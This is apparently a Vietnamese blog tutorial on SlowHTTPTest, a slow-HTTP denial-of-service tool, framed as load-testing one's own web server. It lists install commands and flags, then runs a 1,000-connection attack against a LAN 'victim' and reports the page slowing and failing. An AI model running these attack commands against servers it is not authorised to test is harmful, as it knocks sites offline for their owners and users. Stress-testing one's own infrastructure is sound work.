Thử nghiệm khả năng chịu tải của Website với công cụ SlowHTTPTest

Chào các bạn, hôm nay mình sẽ giới thiệu với các bạn công cụ SlowHTTPTest, bản chất công cụ này là để thực hiện một tấn công HTTP DOS nên dĩ nhiên các bạn có thể sử dụng nó với mục đích tấn công. Tuy nhiên, theo chiều hướng ngược lại, các bạn cũng có thể sử dụng công cụ này để thử nghiệm khả năng chịu tải của webserver trước khi public web

Trước tiên tải về SlowHTTPTest bằng câu lệnh

wget http://slowhttptest.googlecode.com/files/slowhttptest-1.4.tar.gz

Xả nén

tar -zxvf slowhttptest-1.4.tar.gz

Cài đặt

cd slowhttptest-1.4
./configure
make
make install

Để sử dụng SlowHTTPTest, chúng ta sử dụng câu lệnh

slowhttptest -c 1000 -B -g -o output-file-name -i 100 -r 300 -s 10240 -u http://www.example.com/url/page.html -x 20

Giải thích câu lệnh trên

-c Số lượng các kết nối, theo pr của tác giả SlowHTTPTest thì phiên bản 1.4 này có thể tạo tới 64000 kết nối

-H, B,  Xác định chúng ta sẽ sử dụng phần gọi là “slow down” trong header hay trong body của gói tin

-g  Sinh output dạng csv, xml, html

-i  Thời gian giữa 2 connection

-o  Định ra đường dẫn, tên file, nếu sử dụng lựa chọn này thì phải có -g

-r  số lượng kết nối trong 1 giây

-s  giá trị byte trong trường  Content-Length, yêu cầu phải có -B trước

-u  target URL

-v  mức độ chi tiết, có các mức từ 0-4

-x  Độ lớn (byte) tối đa của dữ liệu gửi đến

Trước tiên ta thử với 1000 connection tới victim 192.168.0.180

slowhttptest -c 1000 -B -g -o ouput_dos -i 100 -r 300 -s 10240 -u 192.168.0.180 -x 20

Refresh page nào, dữ liệu chậm, nhưng mà vẫn load được:

Nâng số connection lên, opps:

Đây là output của quá trình tấn công